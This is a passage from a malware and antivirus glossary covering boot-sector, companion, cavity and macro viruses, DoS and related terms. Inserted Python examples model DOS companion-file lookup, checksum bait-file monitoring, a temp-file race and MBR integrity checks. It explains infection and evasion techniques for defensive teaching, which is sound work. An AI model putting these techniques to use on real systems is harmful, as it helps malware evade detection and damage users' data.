The process of creating a duplicate copy of data. Some programs back up data files while maintaining both the current version and the preceding version on disk. However, a backup is not considered secure unless it is stored away from the original, so that whatever destroys the original (a virus payload included) cannot reach the copy.
Boot Code

The program recorded in a boot sector is known as boot code. Boot sectors usually contain boot code because these small programs have the job of starting to load a PC’s operating system once the BIOS completes its POST checks.

Boot Infector, Boot Sector Infector, BSI

A boot sector infector virus places its starting code in the boot sector. When the computer tries to read and execute the program in the boot sector, the virus is loaded into memory, where it can gain control over basic computer operations. From memory, a boot sector infector can spread to other drives (floppy, network etc.) on the system. Once the virus is running, it usually executes the normal boot program, which it has stored elsewhere on the disk, so that the machine appears to boot normally.

Boot Record

The program recorded in the boot sector. This record contains information on the characteristics and contents of the disk and information needed to boot the computer. If a user boots a PC with a floppy disk, the system reads the boot record from that disk.

Boot Sector

An area located on the first track of floppy disks and logical disks that contains the boot record. Boot sector usually refers to this specific sector of a floppy disk, whereas the term Master Boot Sector usually refers to the corresponding first sector of a hard disk. See also: Master Boot Record

Boot Virus

A virus that infects boot sectors. Refer to Boot Sector Infector for more details.

Bug

An unintentional fault in a program that causes actions neither the user nor the program author intended.
CARO

It stands for Computer Antivirus Research Organisation, an informal group of professional antivirus researchers committed to improving the state of the art.

Cavity Infector, Cavity Virus

A cavity virus overwrites a part of its host file (typically a run of padding or otherwise unused bytes) without increasing the length of the file, while also preserving the host’s functionality. Because the file size does not change, size-based checks will not notice it.

Class Infector

A class infector is a macro virus whose code resides in one or more class modules.

Cluster Virus, Link Virus

Apart from directly infecting host files as appenders and prependers do, there are other ways to intercept calls to an executable file and run malicious code, either before, or instead of, the code from the intended file. One such method is cluster infection, used by a small number of DOS viruses: the virus rewrites the starting-cluster field of directory entries so that every program appears to begin at the cluster holding the virus body, and records the original starting cluster so that it can pass control to the real program afterwards.

CMOS

Complementary Metal Oxide Semiconductor: the battery-backed RAM used in AT and later PCs to store hardware configuration information uses CMOS technology. As this memory is not in the CPU address space, but addressed via I/O port reads and writes, its contents cannot be directly executed. This means that viruses cannot reside in nor infect the CMOS RAM. Some viruses alter the contents of the CMOS RAM as a payload, either scrambling them or removing the reference to the floppy drive so the hard drive’s (infected) MBR will always run first during boot-up.

Commercial RAT

Any commercial product that is normally used for remote administration, but which might be exploited to do this without a user’s consent or awareness, is called a Commercial RAT. See also RAT.

Companion Virus

There are more methods of infecting a system than the most commonly used one of modifying an existing file (see Parasitic Virus). Given the way command-line interpreters (or shells) of several operating systems work, a virus can copy itself onto the system as an entire program yet be sure that much of the time, attempts to invoke a program will result in the virus’ code being run first. For example, the DOS shell runs a .COM file in preference to an .EXE file of the same name in the same directory, and searches the current directory before the PATH, so a virus that drops PROG.COM beside PROG.EXE, or earlier in the search path, is run whenever the user types PROG; it then runs the real program so nothing appears amiss. Such programs are known as companion viruses and there are several forms of this infection method.
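The following is an added example, not code from the original glossary, that models the DOS shell’s command lookup order so the companion mechanism can be seen concretely. The directory listings, the PATH and the program names are constructed; the .COM/.EXE/.BAT precedence and current-directory-first search are the real COMMAND.COM behaviour.

```python
"""Added example (not from the original page): a model of the DOS shell's
command lookup, showing how a companion file is run in place of the program
the user asked for. All directory listings are constructed."""

# COMMAND.COM tries these extensions, in this order, in each directory.
EXT_ORDER = (".COM", ".EXE", ".BAT")

# Constructed listings: directory name -> set of file names it contains.
SAMPLE_CLEAN = {"C:\\DOS": {"EDIT.EXE", "FORMAT.COM"}, "C:\\WORK": {"NOTES.TXT"}}
# Classic companion: EDIT.COM dropped beside the real EDIT.EXE.
SAMPLE_INFECTED = {"C:\\DOS": {"EDIT.EXE", "FORMAT.COM", "EDIT.COM"},
                   "C:\\WORK": {"NOTES.TXT"}}
# Path companion: EDIT.COM placed in the current directory, searched first.
SAMPLE_PATH_COMPANION = {"C:\\DOS": {"EDIT.EXE", "FORMAT.COM"},
                         "C:\\WORK": {"NOTES.TXT", "EDIT.COM"}}


def matches_in_order(command, cwd, path, listing):
    """Every file the shell could map `command` to, in lookup order.

    The current directory is searched first, then each PATH entry; within
    a directory .COM beats .EXE beats .BAT. The first entry is what runs;
    everything after it is shadowed, which is what a companion exploits."""
    name = command.upper()
    found = []
    for directory in (cwd, *path):
        files = {f.upper() for f in listing.get(directory, ())}
        for ext in EXT_ORDER:
            if name + ext in files:
                found.append(f"{directory}\\{name}{ext}")
    return found


def resolve(command, cwd, path, listing):
    """The file the shell actually executes for `command`, or None."""
    found = matches_in_order(command, cwd, path, listing)
    return found[0] if found else None


def shadowed_programs(command, cwd, path, listing):
    """Programs that would have run if the first match were not there:
    a quick way to spot a companion sitting in front of a real .EXE."""
    return matches_in_order(command, cwd, path, listing)[1:]


if __name__ == "__main__":
    for label, listing in (("clean", SAMPLE_CLEAN),
                           ("companion", SAMPLE_INFECTED),
                           ("path companion", SAMPLE_PATH_COMPANION)):
        print(label, "->", resolve("edit", "C:\\WORK", ["C:\\DOS"], listing),
              "shadows", shadowed_programs("edit", "C:\\WORK", ["C:\\DOS"], listing))
```

Typing `edit` resolves to `C:\DOS\EDIT.EXE` on the clean listing, but to `C:\DOS\EDIT.COM` once the companion is dropped, and to `C:\WORK\EDIT.COM` when it sits in the current directory; in both infected cases the real program shows up as shadowed.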

Constructor Kit, Generator Kit

Some virus writers are not content with writing their own viruses and have wondered about bringing the ‘opportunity’ of becoming a virus writer to the masses. The solution to this is usually some form of ‘construction kit’: a program even a non-programmer can run, feed some parameters into and then produce a virus.

Crack

Any software designed to modify other software for the purpose of removing usage restrictions. An example is a ‘patcher’ or ‘patch generator’ that will replace bytes at specified locations in a file, rendering it as good as a fully-licensed version.

Data Diddlers

Data Diddler is a popular name for a virus that contains a data-modifying payload. This type of virus may, for instance, change 0s to 9s in an MS Excel spreadsheet, or it may even replace certain words.

Checksum

An identifying number calculated from a file’s contents. The slightest change in a file changes its checksum. This is used to ensure that you have the exact same file as the one written by the author. A simple checksum (such as a CRC) can be defeated by an attacker who deliberately adjusts bytes to keep the old value; a cryptographic hash such as SHA-256 cannot practically be fooled in this way, so that is what integrity checkers should use.
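The following is an added example, not part of the original glossary, that puts the Bait File and Checksum entries together: it plants a decoy program, records a digest baseline for a directory, and reports anything that changed. The bait file name, its contents and the ‘infection’ that appends to it are all constructed for the demonstration; a real monitor would keep its baseline somewhere the monitored machine cannot alter it.

```python
"""Added example (not from the original page): a minimal bait-file plus
checksum monitor. Bait name, bait body and the simulated infection are
constructed for the demonstration."""
import hashlib
import os
import tempfile

BAIT_NAME = "GOAT.COM"                  # assumed name for the decoy program
BAIT_BODY = b"\xC3" + b"\x90" * 255     # RET followed by NOPs: runs, does nothing


def file_digest(path, algo="sha256"):
    """Cryptographic digest of a file's contents, read in chunks."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def plant_bait(directory):
    """Write a decoy executable whose only purpose is to be infected."""
    path = os.path.join(directory, BAIT_NAME)
    with open(path, "wb") as f:
        f.write(BAIT_BODY)
    return path


def baseline(directory):
    """Record (size, digest) for every file under `directory`."""
    snap = {}
    for root, _dirs, files in os.walk(directory):
        for name in files:
            p = os.path.join(root, name)
            snap[os.path.relpath(p, directory)] = (os.path.getsize(p), file_digest(p))
    return snap


def check(directory, snap):
    """Compare the directory against a baseline.

    Returns {'modified': [...], 'added': [...], 'removed': [...]}. The
    digest, not just the size, is compared, so a cavity infection that
    keeps the file length is still reported as modified."""
    now = baseline(directory)
    return {
        "modified": sorted(k for k in now if k in snap and now[k] != snap[k]),
        "added": sorted(k for k in now if k not in snap),
        "removed": sorted(k for k in snap if k not in now),
    }


def demo():
    """Plant bait, take a baseline, simulate an infection, re-check."""
    with tempfile.TemporaryDirectory() as d:
        bait = plant_bait(d)
        snap = baseline(d)
        before = check(d, snap)
        # Constructed 'infection': something appends itself to the bait file.
        with open(bait, "ab") as f:
            f.write(b"APPENDED-CODE")
        after = check(d, snap)
        return before, after


if __name__ == "__main__":
    print(demo())
```

Run on a real directory tree, `baseline()` followed later by `check()` gives the same answer an integrity checker does; the bait file simply guarantees there is at least one executable on the disk whose only legitimate state is ‘unchanged’.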

Clean, Disinfect

To remove a virus or other malicious software from a computer, file or disk.

COM File

A type of executable file that is limited to 64 KB. These simple files are often used for utility programs and small routines. Because COM files are executable, viruses can infect them. This file type has the extension COM.

Cookie

Cookies are blocks of text placed in a file on your computer’s hard disk. Web sites use cookies to identify users who revisit the site. Cookies might contain login or registration information, ‘shopping cart’ information or user preferences. When a server receives a browser request that includes a cookie, the server can use the information stored in the cookie to customise the Web site for the user. Cookies can be used to gather more information about a user than would be possible without them.

DDoS

Distributed Denial of Service. Attempts to DoS large sites using most forms of resource exhaustion attack, and particularly network bandwidth wasting strategies, are often impossible for a single attacking machine because of the sheer scale of resources available to the attacked site. A DDoS attack therefore spreads the attack across many machines (typically ones compromised beforehand and controlled by the attacker) that all target the site at once.

Denial of Service, DoS

An attack on a computer system intended to reduce, or entirely block, the level of service that ‘legitimate clients’ can receive from that system. These range in scope from network bandwidth wasting and/or swamping, through exhausting various machine resources (such as memory, disk space, thread or process handles) required by the process(es) providing the service, to exploiting vulnerabilities that crash the service process or the underlying system. Although not commonly associated with viruses, denial of service components are included in some viral payload routines.

Destructiveness

This is measured based on the amount of damage that a malicious program can possibly achieve once a computer has been infected.
These metrics can include attacks on important operating system files, triggered events, clogging e-mail servers, deleting or modifying files, releasing confidential information, performance degradation, compromising security settings, and the ease with which the damage may be fixed.

Dialler

Software that dials a phone number. Some diallers connect to local Internet Service Providers and are beneficial as configured. Others connect to premium-rate or toll numbers without user awareness or permission, running up the victim’s phone bill.

Direct Action Virus

A virus that attempts to locate and infect one or more targets when it is run and then exits is called a direct action virus. In single-tasking operating systems such as DOS, direct action viruses usually only infect a small number of targets during each run, as the ‘find then infect’ process slows the normal execution of the infected host from which the virus is running, and significant slowing of a machine is likely to warn its user of the presence of something ‘untoward’.

DOS

Disk Operating System: most famously, MS-DOS and IBM DOS, but also DR DOS and others.

Downloader

A downloader is a program that automatically downloads and runs and/or installs other software without the user’s knowledge or permission.

Dropper, Injector

A program that installs a virus, but is not, itself, infected is known as a dropper. These are not very common and most are used to install boot viruses.

Disinfection

Most anti-virus software carries out disinfection after reporting the presence of a virus. During disinfection, the virus is removed and, whenever possible, any affected data is recovered.
DOC File

A Microsoft Word document file. In the past, these files contained only document data, but with many newer versions of Microsoft Word, DOC files can also include small programs called macros. Many virus authors use the macro programming language to attach malicious macros to DOC files. This file type has the extension DOC.

EEPROM

Electrically Erasable and Programmable Read-Only Memory. A type of ROM whose contents are non-volatile, but modifiable through the application of appropriate chip reprogramming voltages.

EICAR

European Institute for Computer Antivirus Research. A group of academics, researchers, law enforcement specialists and other technologists united against the writing and proliferation of malicious code such as computer viruses or trojan horses, and against computer crime, fraud and the misuse of computers or networks.

E-mail Worm

A commonly used misnomer for mass mailing viruses.

Emulator

A commonly used method for detecting polymorphic viruses is to simulate running part of a program’s code in an emulator. The purpose is to see if the code decrypts known virus code. There are several essentially irresolvable issues with emulator design. For example, ensuring they don’t run for ‘too long’ on each file, thus slowing the scanner down, and making them complex enough to include sufficient aspects of the environment they simulate that anti-emulation and emulation detection techniques employed in some viruses do not reduce their usefulness.

Encrypted Virus

An early attempt at evading scan string driven virus detectors was self-encryption with a variable key. The virus body is stored scrambled under a key that changes from one replicant to the next, so no constant scan string can be taken from it; only the small decryption routine that runs first stays constant, and that is what scanners came to look for (see Emulator).
Encryption Tool

Any software that can be used to scramble documents, software, or systems so that only those possessing a valid key are able to unscramble it. Encryption tools are used to secure information; sometimes unauthorised use of encryption tools in an organisation is a cause for concern.

EPROM

Erasable and Programmable Read-Only Memory. A type of ROM whose contents are non-volatile but modifiable through the application of appropriate chip reprogramming voltages.

Error Hijacker

Any software that resets your browser’s settings to display a new error page when a requested URL is not found. Hijacks may reroute your information and address requests through an unseen site, capturing that information. In such hijacks, your browser may behave normally, but be slower.

Exploit

A way of breaking into a system. An exploit takes advantage of a weakness in a system in order to hack it. Exploits are the root of the hacker culture.

exe File

An executable file, as contrasted with a document or data file. Usually executed by double-clicking its icon or a shortcut on the desktop, or by entering the name of the program at a command prompt. Executable files can also be executed from other programs, batch files or various script files.
False Positive, False Negative

These terms derive from their use in statistics. If it is claimed that a file or boot sector is infected by a virus when in reality it is clean, a false positive (or Type I) error is said to have occurred. Conversely, if a file or boot sector that is infected is claimed to not be infected, a false negative (or Type II) error has been made. From an antivirus perspective, false negatives probably seem more serious than false positives, but both are undesirable: a false positive on a system file can do as much damage as a virus when the scanner ‘disinfects’ it.

Fast Infector

When programs infected with common file infectors are run, the virus code usually gets control first. It then checks that it has not already gone resident, copies itself into memory, and hooks a system interrupt or event handler associated with the host platform’s ‘load and execute’ function. When that function is subsequently called, the virus’ infection routine runs, checking whether the program that is about to run has been infected already, and if not, infects it. A fast infector goes further and also infects programs that are merely opened or read, so that, for instance, an on-demand antivirus scan of a disk can end up infecting every executable the scanner touches.

Mass Mailer, Fast Mailer

A virus that distributes itself via e-mail to multiple addressees at once is known as a mass mailer.

FAT, File Allocation Table

A crucial part of the standard file systems employed in all versions of DOS and Windows 9x. The FAT records the chaining of disk clusters and the final cluster in a file. A file’s first cluster is stored in its directory entry and also acts as an offset into the FAT’s chaining table, so the rest of the file can be located.

Field Sample, Field Virus, In the Field

Sometimes viruses are said to be ‘in the field’ or ‘reported from the field’. This may be loose usage of the term, or it may be to draw the distinction between viruses that have been seen in a small number of real-world infection incidents (‘in the field’) and those that have reached the top half of the WildList (‘In the Wild’).

File Infector

These are viruses that attach themselves to (or replace; see Companion Virus) .COM and .EXE files, although in some cases they will infect files with other extensions such as .SYS, .DRV, .BIN, .OVL, .CPL, .DLL, .SCR and others. The most common file viruses are resident viruses, loading into memory at the time the first copy is run, and taking clandestine control of the computer. Such viruses commonly infect additional program files as they are run or even just accessed. But there are many non-resident viruses, too, which simply infect one or more files whenever an infected file is run.

File Race Condition

Some applications store information in unsecured files and folders like the temp directory. A file race condition occurs where an attacker has the chance to modify these files before the original application has finished with them. If the attacker successfully monitors, attacks and edits these temp files, the original application will then process them as if they were legitimate. The name of this kind of attack comes from the attacker’s ‘race to edit the file’; the same flaw is known more generally as a time-of-check-to-time-of-use (TOCTOU) bug, and the defence is to create such files atomically, with a name the attacker cannot predict and permissions that keep other users out.
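The following is an added example, not part of the original glossary, showing the race just described: a vulnerable routine writes to a predictable temp file and later re-opens it by name, and an attacker who gets a turn in between replaces the contents; beside it is the hardened version using `tempfile.mkstemp` (unpredictable name, exclusive create, mode 0600) and a single descriptor held open for the whole operation. The temp-file name and the `between` hook that stands in for the scheduler giving the attacker a turn are constructed for the demonstration.

```python
"""Added example (not from the original page): a temp-file race (TOCTOU),
vulnerable and hardened. The file name and the attacker are constructed."""
import os
import stat
import tempfile

PREDICTABLE = "app.tmp"   # assumed name used by the vulnerable code


def vulnerable_roundtrip(tmp_dir, data, between=lambda: None):
    """Write data to a predictable temp file, then read it back and
    'process' it. `between` stands in for the attacker getting scheduled
    after the write and before the read; that gap is the race window."""
    path = os.path.join(tmp_dir, PREDICTABLE)
    with open(path, "w") as f:           # default mode, predictable name
        f.write(data)
    between()                            # attacker edits app.tmp here
    with open(path) as f:                # re-opened by name: gets whatever is there
        return f.read()


def attacker(tmp_dir):
    """The racing attacker only needs to know the name."""
    with open(os.path.join(tmp_dir, PREDICTABLE), "w") as f:
        f.write("attacker content")


def hardened_roundtrip(tmp_dir, data, between=lambda: None):
    """mkstemp gives an unpredictable name, O_CREAT|O_EXCL and mode 0600.
    The file is written and read back through the one descriptor and never
    re-opened by name, so there is no check-then-use gap to slip into.
    Returns (content read back, permission bits)."""
    fd, path = tempfile.mkstemp(dir=tmp_dir, prefix="app-")
    try:
        with os.fdopen(fd, "w+") as f:
            f.write(data)
            f.flush()
            between()                    # attacker runs, but cannot find or open it
            f.seek(0)
            return f.read(), stat.S_IMODE(os.stat(path).st_mode)
    finally:
        os.unlink(path)


def demo():
    """Returns (what the vulnerable code processed, what the hardened code
    processed, the hardened file's mode)."""
    with tempfile.TemporaryDirectory() as d:
        lost = vulnerable_roundtrip(d, "trusted data", between=lambda: attacker(d))
        won, mode = hardened_roundtrip(d, "trusted data", between=lambda: attacker(d))
        return lost, won, mode


if __name__ == "__main__":
    print(demo())
```

The vulnerable version processes ‘attacker content’; the hardened one processes the data it wrote, and the file it used was created with mode 0600 so no other user could have opened it even with the name.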

Firewall Killer

Any hacker tool intended to disable a user’s personal firewall. Some will also disable resident anti-virus software.

Flash Memory

Flash memory became of interest to antivirus researchers when the full measure of CIH’s payload was decoded. Because the BIOS of most Pentium-class and later PCs is shipped on a flash memory chip, and most mainboard and system designs leave write mode for that memory readily enabled, the BIOS of a PC can no longer be considered ‘carved in stone’.

Flooder

A program that overloads a connection by any mechanism, such as fast pinging, causing a DoS attack.

FTP Server

When installed without user awareness, an FTP server allows an attacker to download any file on the user’s machine, to upload new files to that machine, and to replace any existing file with an uploaded file.

FDISK/MBR

If you have MS-DOS version 5.0 or later, the command ‘FDISK /MBR’ rewrites the boot code portion of the master boot sector (the first 446 bytes) while leaving the partition table in place. It can therefore remove viruses that infect the master boot sector but leave the partition table where it was, unencrypted. If the virus has moved or encrypted the partition table, or the disk relies on non-standard boot code (a boot manager, say), using this command can produce unexpected results and cause unrecoverable damage; back up first.

Firewall

A firewall prevents computers on a network from communicating directly with external computer systems. A firewall typically consists of a computer that acts as a barrier through which all information passing between the network and the external systems must travel. The firewall software analyses information passing between the two and rejects it if it does not conform to pre-configured rules.

Germ

A first generation sample of a virus. Technically, the term is reserved for forms of the virus that are in some way ‘special’, such that another sample could not be produced as the result of a normal infection event.

Ghost Positive

This is a specific form of false positive, in which the error is due to ‘leftover pieces’ or ‘remnants’ of a virus that are incorrectly detected and reported as an infection. As the virus is not present, or is present but inactive, it is erroneous for a scanner to report an infection.

Globbing

Globbing is the use of wildcard characters or arguments to greatly increase the amount of data requested. An example is ‘dir *.*’ in DOS: this command asks for all file names with all file extensions (everything) in the current directory. By making globbing requests to a Web server it is sometimes possible to cause a Denial of Service, as the server is too busy to deal with legitimate requests.

Heuristic Analysis, Heuristic Scan

Behaviour-based analysis of a computer program by anti-virus software to identify a potential virus, rather than matching it against known scan strings. Heuristic scanning can detect viruses the vendor has never seen, but it also produces false alarms when a clean program happens to do the things a virus would do.
Hijacking

This is an attack whereby an active, established session is intercepted and used by the attacker. Hijacking can occur locally if, for example, a legitimate user leaves a computer unprotected. Remote hijacking can occur via the Internet.

Hoax

A hoax is a message, typically distributed via e-mail or newsgroups, which is written to deliberately spread fear, uncertainty and doubt. Just like the viruses they purport to describe, they are forwarded from user to user, slowing network and Internet traffic and causing damage ‘per se’, by wasting users’ time and by prompting well-meaning, and unnecessary, clean-up procedures. These messages may concern completely fictitious viruses and trojans, or they may even be misleadingly warning users about legitimate programs.

Homepage Hijacker

Any software that changes your browser’s home page to some other site without your explicit permission. Hijacks may reroute your information and address requests through an unseen site, capturing that information. In such hijacks, your browser may behave normally, but be slower.

Hostile ActiveX

An ActiveX control is essentially a Windows program that can be distributed from a Web page. These controls can do literally anything a Windows program can do. A Hostile ActiveX program does something that its user did not intend for it to do, such as erasing a hard drive, dropping a virus or trojan onto your machine, or scanning your drive for tax records or documents. As with other trojans, a Hostile ActiveX control will normally appear to have some other function than what it actually has.

Hostile Java

Browsers include a ‘virtual machine’ that encapsulates the Java program and prevents it from accessing your local machine. The theory behind this is that a Java ‘applet’ is really content, such as graphics, rather than full application software. However, as of July 2000, all known browsers have had bugs in their Java virtual machines that would allow hostile applets to break out of this sandbox and access other parts of the system. As a matter of fact, most security experts browse with Java disabled on their computers, or encapsulate it with further sandboxes or virtual machines.

Hostile Script

A script is a text file with a .VBS, .WSH, .JS, .HTA, .JSE or .VBE extension. The .VBS, .JS, .JSE, .VBE and .WSH files are executed by the Windows Script Host (wscript.exe or cscript.exe), which interprets the instructions in the script and acts on them; .HTA files are HTML Applications run by mshta.exe with the same unrestricted access to the system. A hostile script performs unwanted actions.

HTTP Server

When installed without user awareness, an HTTP server allows an attacker to use a Web browser to view, and thus retrieve, information collected by other software placed on the user’s machine.

Hole

A vulnerability in the design of software and/or hardware that allows circumvention of security measures.

Host

A term often used to describe the computer file to which a virus attaches itself. Most viruses run when the computer or user tries to execute the host file.

Impact

The extent to which an attacker may gain access to a system and the severity of the consequences for the organisation.

IRC War

Any tool that uses Internet Relay Chat for spoofing, eavesdropping, sniffing, spamming, breaking passwords, harassment, fraud, forgery, electronic trespassing, tampering, hacking, nuking or system contamination (including, without limitation, the use of viruses, worms and Trojan horses causing unauthorised, damaging or harmful access to, or retrieval of, information and data on your computer), and other forms of activity that may even be considered unlawful.

In The Wild

A virus is ‘in the wild’ if it is verified as having caused an infection outside a laboratory situation. Most viruses are in the wild and differ only in prevalence.

Joiner

Loosely, a joiner is a program that takes two or more files and ‘sticks them together’. In antivirus and malware circles it is typically used in reference to utilities that join two or more files together with one or more of these being executables. See also: Binder

Joke Program

In general, these aim to entertain either the recipient or the supplier of the program, although it is probably the case that the joke is usually at the expense of the recipient.

Infection

The action a virus carries out when it enters a computer system or storage device.

JavaScript

JavaScript is a scripting language that can run wherever there is a suitable script interpreter, such as Web browsers, Web servers or the Windows Scripting Host.

Key Generator

This pertains to any tool designed to break software copy protection by extracting internally-stored keys, which can then be entered into the program to convince it that the user is an authorised purchaser.

Key

The Windows Registry uses keys to store computer configuration settings. When a user installs a new program or the configuration settings are otherwise altered, the values of these keys change. If viruses modify these keys, they can produce damaging effects, and many use the Registry’s Run keys to have themselves started again at every login.

Logic Bomb

A logic bomb is a type of trojan horse that executes when specific conditions occur. Triggers for logic bombs can include a change in a file, a particular series of keystrokes, or a specific time or date. See also: Time Bomb

Macro

A macro is a series of instructions designed to simplify repetitive tasks within a program such as Microsoft Word, Excel or Access. Macros can be set to execute when a user opens the associated file. Microsoft’s latest macro programming language is simple to use, powerful, and not limited to Word documents. Macros are mini-programs and can therefore carry viruses. See also: Macro Virus

Macro Virus

A macro virus is a malicious macro. Macro viruses are written in a macro programming language and attach to a document file (such as Word or Excel). When a document or template containing the macro virus is opened in the target application, the virus runs, does its damage and then copies itself into other documents, commonly via the application’s global template so that every document opened afterwards is infected. Continual use of the program results in the spread of the virus.

Mail Bomber

Software that floods a victim’s inbox with hundreds or thousands of mails. Such mail generally does not correctly reveal its source.

Mailbomb

A flood of e-mail (typically many thousands of messages), or a few very large messages, sent to a user’s e-mail account for the purpose of crashing the system or preventing genuine messages from being received.

Malware, Malicious Software

A generic term used to describe malicious software such as viruses, trojan horses, malicious active content and others.

Malicious Code

A piece of code designed to damage a system or the data it contains, or to prevent the system from being used in its normal manner.

Master Boot Record, Master Boot Sector, MBR, MBS

The boot sector at the beginning of a hard drive (sector location 0,0,1 in CHS notation) is known as the master boot sector or, more commonly, the master boot record. It holds the boot code that the BIOS loads first, followed by the four-entry partition table and a two-byte signature; the boot code locates the active partition and hands control to that partition’s own boot sector.
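The following is an added example, not part of the original glossary, that parses the 512-byte master boot record layout referred to in the Boot Sector, Master Boot Record and FDISK/MBR entries and tells a boot-code change (what an MBR infector makes, and what FDISK /MBR rewrites) apart from a partition-table change (the case where a blind FDISK /MBR loses the partitions). The sample MBR bytes, including the placeholder boot stubs, are constructed, not taken from any real disk or virus.

```python
"""Added example (not from the original page): an MBR parser and a
region-by-region comparison against a known-good copy. Sample sectors are
constructed; the boot 'code' is placeholder bytes."""
import hashlib
import struct

SECTOR = 512
CODE_LEN = 446            # boot code occupies bytes 0..445
TABLE_OFF = 0x1BE         # four 16-byte partition entries follow
SIG_OFF = 0x1FE           # 0x55 0xAA


def parse_mbr(sector):
    """Split an MBR into boot code and the non-empty partition entries."""
    if len(sector) != SECTOR:
        raise ValueError("MBR must be exactly 512 bytes")
    if sector[SIG_OFF:SIG_OFF + 2] != b"\x55\xAA":
        raise ValueError("missing 0x55AA boot signature")
    parts = []
    for i in range(4):
        raw = sector[TABLE_OFF + 16 * i: TABLE_OFF + 16 * (i + 1)]
        status, _chs_start, ptype, _chs_end, lba, count = struct.unpack(
            "<B3sB3sII", raw)
        if ptype == 0:
            continue                        # empty slot
        parts.append({"index": i, "bootable": status == 0x80,
                      "type": ptype, "lba_start": lba, "sectors": count})
    return {"boot_code": sector[:CODE_LEN], "partitions": parts}


def build_mbr(boot_code, partitions):
    """Assemble a constructed MBR from boot code and up to four
    (type, lba_start, sectors[, bootable]) tuples. CHS fields are set to
    0xFFFFFF, as modern tools do when LBA is authoritative."""
    code = boot_code.ljust(CODE_LEN, b"\x00")[:CODE_LEN]
    table = b""
    for i in range(4):
        if i < len(partitions):
            ptype, lba, count, *flag = partitions[i]
            status = 0x80 if (flag and flag[0]) else 0x00
            table += struct.pack("<B3sB3sII", status, b"\xFF\xFF\xFF",
                                 ptype, b"\xFF\xFF\xFF", lba, count)
        else:
            table += b"\x00" * 16
    return code + table + b"\x55\xAA"


def diff_mbr(known_good, current):
    """Which regions differ: 'boot_code' (typical MBR infection, repaired
    by rewriting the code) and/or 'partition_table' (where rewriting only
    the code would leave the disk's partitions unreachable)."""
    changed = []
    if known_good[:CODE_LEN] != current[:CODE_LEN]:
        changed.append("boot_code")
    if known_good[TABLE_OFF:SIG_OFF] != current[TABLE_OFF:SIG_OFF]:
        changed.append("partition_table")
    return changed


def code_digest(sector):
    """Digest of the boot-code region only, for a checksum baseline."""
    return hashlib.sha256(sector[:CODE_LEN]).hexdigest()


# Constructed samples: one bootable FAT16 (type 0x06) partition at LBA 63.
CLEAN_CODE = b"\xFA\x33\xC0\x8E\xD0\xBC\x00\x7C" + b"\x90" * 8   # placeholder stub
CLEAN_MBR = build_mbr(CLEAN_CODE, [(0x06, 63, 2097088, True)])
# 'Infected': boot code replaced, partition table untouched.
INFECTED_MBR = build_mbr(b"\xEB\xFE" + b"\x41" * 100, [(0x06, 63, 2097088, True)])

if __name__ == "__main__":
    print(parse_mbr(CLEAN_MBR)["partitions"])
    print(diff_mbr(CLEAN_MBR, INFECTED_MBR))
```

Reading the first 512 bytes of a physical drive into `parse_mbr()` and comparing against a saved copy with `diff_mbr()` is the check to make before reaching for FDISK /MBR: if ‘partition_table’ is in the result, rewriting the code alone will not get the disk back.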

Master Boot Record Infector

A virus that infects master boot records.

Middle Infector

Refers to an entry point obscuring (EPO) virus, which places its code, or a jump to its code, somewhere in the middle of the host rather than at the host’s entry point. Due to design considerations in some scanners, some non-EPO viruses are referred to as middle infectors and may require special handling.

Multipartite Virus

A virus that infects two or more different target types is generally referred to as a multipartite virus. Early multipartite viruses infected boot sectors and DOS executables, but more esoteric combinations have been seen.

Mutex

MUTual EXclusion object. A mutex is a program object that controls access to a resource shared by multiple threads or processes: any thread that needs the resource must lock the mutex before using it, which keeps the others out until it is released. Malware commonly creates a mutex with a fixed name on start-up and exits if it already exists, so that only one copy runs at a time; such names are a useful identifying mark for analysts.

Memory-Resident Virus

A memory-resident virus stays in memory after it executes and infects other files when certain conditions are met. Non-memory-resident viruses are active only while an infected application runs.
Mutating Virus

A mutating virus changes, or mutates, as it progresses through its host files, making disinfection more difficult. The term usually refers to viruses that intentionally mutate, though some experts also include non-intentionally mutating viruses. See also: Polymorphic Virus

Network Creeper

Viruses that spread to new hosts by finding writable network drives (or ‘shares’) and copying themselves there or infecting files on those shares are sometimes referred to as network creepers.

Notifier

Any tool designed for stealth notification of an attacker that a victim has installed and run some pest. Such notification might be done by FTP, SMS, SMTP, or other method, and might contain a variety of information. Often used in combination with a Packer, a Binder and a Downloader.

Newsgroup

An electronic forum where readers post articles and follow-up messages on a specified topic. An Internet newsgroup allows people from around the globe to discuss common interests. Each newsgroup name indicates the newsgroup’s subject in terms of increasingly narrow categories, such as alt.comp.virus.

Oligomorphic Virus

An encrypted virus that has several forms of its decryption code, selecting between them (usually randomly) when writing its decryptor for a new replicant.

Overwriter

In general, the simplest form of virus is a program that just copies itself over the top of other programs. Such viruses are known as overwriters and are commonly the first types of viruses written for newly ‘virused’ platforms (e.g. Phage, the first PalmOS virus, discovered in late 2000, was a simple overwriter).
On-access Scanner

A real-time virus scanner that scans disks and files automatically, and often in the background. An on-access scanner scans files for viruses as the computer accesses the files.

On-demand Scanner

A virus scanner the user starts manually. Most on-demand scanners allow the user to set various configurations and to scan specific files, folders or disks.

On-schedule Scanner

A virus scanner the user schedules to start automatically at a given time.

Peer-to-Peer, P2P

Any peer-to-peer file swapping program, such as Audiogalaxy, Bearshare, Blubster, E-Mule, Gnucleus, Grokster, Imesh, KaZaa, KaZaa Lite, Limewire, Morpheus, Shareaza, WinMX and Xolox, in an organisation, can degrade network performance and consume vast amounts of storage. They may create security issues as outsiders are granted access to internal files. They are often bundled with Adware or Spyware.

Packer

A utility which compresses a file, encrypting it in the process. It adds a header that automatically expands the file in memory when it is executed, and then transfers control to that file.

Parasitic Virus

Parasitic viruses are those that modify some existing code resource to effect replication.

Partition Boot Sector

The system boot sector of the active partition.

Partition Table

Partition tables are a crucial part of how DOS and related operating systems understand the layout of partitions (or logical drives) on hard disks. For the sake of interoperability, most OSes that run on PCs also follow the dictates of these fundamental partition information resources.
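As an added illustration of the MBR and partition-table layout these entries describe (example code written for this page, not the book's own), the Python below builds a constructed 512-byte MBR sector, decodes its partition table and runs the integrity checks a defender would apply when hunting for a master boot record infector: the 0x55AA signature, sane status bytes, a single active partition, non-overlapping partitions, and a hash of the boot-code region compared against a baseline recorded while the disk was known clean. The boot-code bytes and partition entries are made up for the demo.

```python
"""Parse and integrity-check a master boot record (MBR) sector.

Added example; not code from the book. The sector is CONSTRUCTED here
(a few made-up boot-code bytes plus two partition entries), following the
classic MBR layout: boot code in bytes 0-445, four 16-byte partition
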